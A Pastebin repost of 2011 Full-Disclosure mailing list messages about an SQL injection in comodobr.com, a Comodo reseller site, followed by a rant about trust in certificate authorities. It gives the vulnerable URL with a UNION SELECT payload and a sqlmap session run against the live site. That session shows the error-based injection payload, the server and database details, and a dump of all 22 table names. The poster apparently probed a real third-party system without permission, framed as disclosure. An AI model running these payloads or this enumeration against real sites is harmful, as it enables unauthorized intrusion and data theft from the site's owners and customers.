Pastebin
API
tools
faq
paste
Login
Sign up
Please fix the following errors:
New Paste
Syntax Highlighting
Received: from [199.48.147.35] by web120908.mail.ne1.yahoo.com via HTTP; Sun, 22 May 2011 11:20:54 PDT X-Mailer: YahooMailClassic/14.0.1 YahooMailWebService/0.8.111.303096 Date: Sun, 22 May 2011 11:20:54 -0700 (PDT) From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles@ymail.com> X-Mailman-Approved-At: Sun, 22 May 2011 19:35:39 +0100 Cc: suporte@comodobr.com Subject: [Full-disclosure] comodobr.com sqli vulnerable link: https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- - http://pastebin.com/9qwdL1pA _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ --------------------------------------------------------------------- PS C:\Python27> nslookup 199.48.147.35 Server: google-public-dns-a.google.com Address: 8.8.8.8 Name: tor-exit-router35-readme.formlessnetworking.net Address: 199.48.147.35 >>> You're not going to find him... <<< >>> Let's check the host: <<<>>><<<>>>< PS C:\Python27> .\python.exe C:\sqlmap-0.9\sqlmap.py --wizard sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 21:00:00 Please enter full target URL (-u): https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 POST data (--data) [Enter for None]: Injection difficulty (--level/--risk). Please choose: [1] Normal (default) [2] Medium [3] Hard > 1 Enumeration (--banner/--current-user/etc). Please choose: [1] Basic (default) [2] Smart [3] All > 1 sqlmap is running, please wait.. sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: prod Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: prod=8 AND (SELECT 1198 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT (CASE WHEN (1198=1198) THEN 1 ELSE 0 END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --- [21:00:00] [INFO] retrieved: 5.0.91-community-log web application technology: PHP 5.2.6, Apache 2.0.63 back-end DBMS: MySQL 5.0 banner: '5.0.91-community-log' [21:00:00] [INFO] retrieved: comodobr_site@localhost current user: 'comodobr_site@localhost' [21:00:00] [INFO] retrieved: comodobr_comodobr current database: 'comodobr_comodobr' current user is DBA: 'False' [*] shutting down at: 21:00:00 PS C:\Python27> >>> Looks real <<<>>><<<>>><<<>>><<<>>> >>> Let's see the inside of the db: <<< web application technology: PHP 5.2.6, Apache 2.0.63 back-end DBMS: MySQL 5.0 banner: '5.0.91-community-log' current user: 'comodobr_site@localhost' current database: 'comodobr_comodobr' current user is DBA: 'False' [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_boleto [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_boleto_associa [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_boleto_categoria [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_boleto_importado [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_boleto_status [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_confirm_pago [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_contab [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_expected_delivery_time [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_hosting_contas [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_meios_pago [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_pedido_status [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_pedido_status_codes [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_pedidos [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_pedidos_historico [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_prod_grupos [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_prods [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_resellers [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_server_software [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_users [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_vw_crm_clientes [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_webhostreport_item [21:00:00] [INFO] retrieved: comodobr_comodobr [21:00:00] [INFO] retrieved: comodo_webhostreport_subitem Database: comodobr_comodobr [22 tables] +-------------------------------+ | comodo_boleto | | comodo_boleto_associa | | comodo_boleto_categoria | | comodo_boleto_importado | | comodo_boleto_status | | comodo_confirm_pago | | comodo_contab | | comodo_expected_delivery_time | | comodo_hosting_contas | | comodo_meios_pago | | comodo_pedido_status | | comodo_pedido_status_codes | | comodo_pedidos | | comodo_pedidos_historico | | comodo_prod_grupos | | comodo_prods | | comodo_resellers | | comodo_server_software | | comodo_users | | comodo_vw_crm_clientes | | comodo_webhostreport_item | | comodo_webhostreport_subitem | +-------------------------------+ [*] shutting down at: 21:00:00 PS C:\Python27> When are comodo going to fix this? How come comodo is a CA? They shouldn't be trusted! And what about TÜRKTRUST.. Who the HELL are they? I don't trust them, but they are still a CA in my browser.. WHY? When are we going to see private certs from paypal, google, etc? Why does Firefox restore all my CA's, when I delete them in the "Certificate Manager"? Do we *STILL* trust https? What's next? GET YOUR SHIT TOGETHER. EDIT: I'm not the "hacker". The "real hacker" is here: http://pastebin.com/u/gimmemyfiles I've just checked his claims, which was true. Everyone can claim that they hacked comodo, but that the vulnerable was fixed, so all I have done is open sqlmap and tested :-) Also here's a new response: Received: from [199.48.147.35] by web120910.mail.ne1.yahoo.com via HTTP; Tue, 24 May 2011 14:58:39 PDT X-Mailer: YahooMailWebService/0.8.111.303096 Date: Tue, 24 May 2011 14:58:39 -0700 (PDT) From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles AT ymail.com> Cc: "support@comodobr.com" <support@comodobr.com> Subject: [Full-disclosure] My comments on comodobr.com I have to agree with Comodo president and CEO, Melih Abdulhayoglu. In fact, anyone that can use sqlmap or pangolin and knows how to google for "filetype:php inurl:prod" could have found that sqli. However the same way the security perimeter of the mainframe _should_ be extended to the desktops connected to it, it might be a good idea for resellers and partners to tighten own their own security. further compromise of comodobr.com systems (_if_possible_) could have been a foothold into Comodo's systems. Just my 50 cents [Edit] The db dump was partial because the only thing omitted from the db dump was request logs. Either way, CSR's and client info shouldn't be "readily available" as this. No beef with comodobr.com or Comodo, just with companies in the security business that don't take care of their own. That's one of the reasons we have been trying to make the internet secure for so long. Some people just don't help. http://pastebin.com/MFSUdCnk _______________________________________________ Full-Disclosure - We believe in it. Hosted and sponsored by Secunia - http://secunia.com/ PS C:\Users\Nicolai> nslookup 199.48.147.35 Server: google-public-dns-a.google.com Address: 8.8.8.8 Name: tor-exit-router35-readme.formlessnetworking.net Address: 199.48.147.35 PS C:\Users\Nicolai>
Optional Paste Settings
Syntax Highlighting:
None
Bash
C
C#
C++
CSS
HTML
JSON
Java
JavaScript
Lua
Markdown (PRO members only)
Objective C
PHP
Perl
Python
Ruby
Swift
4CS
6502 ACME Cross Assembler
6502 Kick Assembler
6502 TASM/64TASS
ABAP
AIMMS
ALGOL 68
APT Sources
ARM
ASM (NASM)
ASP
ActionScript
ActionScript 3
Ada
Apache Log
AppleScript
Arduino
Asymptote
AutoIt
Autohotkey
Avisynth
Awk
BASCOM AVR
BNF
BOO
Bash
Basic4GL
Batch
BibTeX
Blitz Basic
Blitz3D
BlitzMax
BrainFuck
C
C (WinAPI)
C Intermediate Language
C for Macs
C#
C++
C++ (WinAPI)
C++ (with Qt extensions)
C: Loadrunner
CAD DCL
CAD Lisp
CFDG
CMake
COBOL
CSS
Ceylon
ChaiScript
Chapel
Clojure
Clone C
Clone C++
CoffeeScript
ColdFusion
Cuesheet
D
DCL
DCPU-16
DCS
DIV
DOT
Dart
Delphi
Delphi Prism (Oxygene)
Diff
E
ECMAScript
EPC
Easytrieve
Eiffel
Email
Erlang
Euphoria
F#
FO Language
Falcon
Filemaker
Formula One
Fortran
FreeBasic
FreeSWITCH
GAMBAS
GDB
GDScript
Game Maker
Genero
Genie
GetText
Go
Godot GLSL
Groovy
GwBasic
HQ9 Plus
HTML
HTML 5
Haskell
Haxe
HicEst
IDL
INI file
INTERCAL
IO
ISPF Panel Definition
Icon
Inno Script
J
JCL
JSON
Java
Java 5
JavaScript
Julia
KSP (Kontakt Script)
KiXtart
Kotlin
LDIF
LLVM
LOL Code
LScript
Latex
Liberty BASIC
Linden Scripting
Lisp
Loco Basic
Logtalk
Lotus Formulas
Lotus Script
Lua
M68000 Assembler
MIX Assembler
MK-61/52
MPASM
MXML
MagikSF
Make
MapBasic
Markdown (PRO members only)
MatLab
Mercury
MetaPost
Modula 2
Modula 3
Motorola 68000 HiSoft Dev
MySQL
Nagios
NetRexx
Nginx
Nim
NullSoft Installer
OCaml
OCaml Brief
Oberon 2
Objeck Programming Langua
Objective C
Octave
Open Object Rexx
OpenBSD PACKET FILTER
OpenGL Shading
Openoffice BASIC
Oracle 11
Oracle 8
Oz
PARI/GP
PCRE
PHP
PHP Brief
PL/I
PL/SQL
POV-Ray
ParaSail
Pascal
Pawn
Per
Perl
Perl 6
Phix
Pic 16
Pike
Pixel Bender
PostScript
PostgreSQL
PowerBuilder
PowerShell
ProFTPd
Progress
Prolog
Properties
ProvideX
Puppet
PureBasic
PyCon
Python
Python for S60
QBasic
QML
R
RBScript
REBOL
REG
RPM Spec
Racket
Rails
Rexx
Robots
Roff Manpage
Ruby
Ruby Gnuplot
Rust
SAS
SCL
SPARK
SPARQL
SQF
SQL
SSH Config
Scala
Scheme
Scilab
SdlBasic
Smalltalk
Smarty
StandardML
StoneScript
SuperCollider
Swift
SystemVerilog
T-SQL
TCL
TeXgraph
Tera Term
TypeScript
TypoScript
UPC
Unicon
UnrealScript
Urbi
VB.NET
VBScript
VHDL
VIM
Vala
Vedit
VeriLog
Visual Pro Log
VisualBasic
VisualFoxPro
WHOIS
WhiteSpace
Winbatch
XBasic
XML
XPP
Xojo
Xorg Config
YAML
YARA
Z80 Assembler
ZXBasic
autoconf
jQuery
mIRC
newLISP
q/kdb+
thinBasic
Paste Expiration:
Never
Burn after read
10 Minutes
1 Hour
1 Day
1 Week
2 Weeks
1 Month
6 Months
1 Year
Paste Exposure:
Public
Unlisted
Private
Folder:
(members only)
Password
NEW
Enabled
Disabled
Burn after read
NEW
Paste Name / Title:
Create New Paste
Hello
Guest
Sign Up
or
Login
Sign in with Facebook
Sign in with Twitter
Sign in with Google
You are currently not logged in, this means you can not edit or delete anything you paste.
Sign Up
or
Login
Public Pastes
Possible target hi...
Lua | 48 min ago
Untitled
Python | 49 min ago
hello world test p...
BrainFuck | 1 hour ago
Delete player body...
C++ | 1 hour ago
Untitled
Bash | 1 hour ago
EH IDK
Lua | 1 hour ago
TW-TST02-EX03
HTML 5 | 1 hour ago
TW-TST02-EX02
HTML 5 | 1 hour ago
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!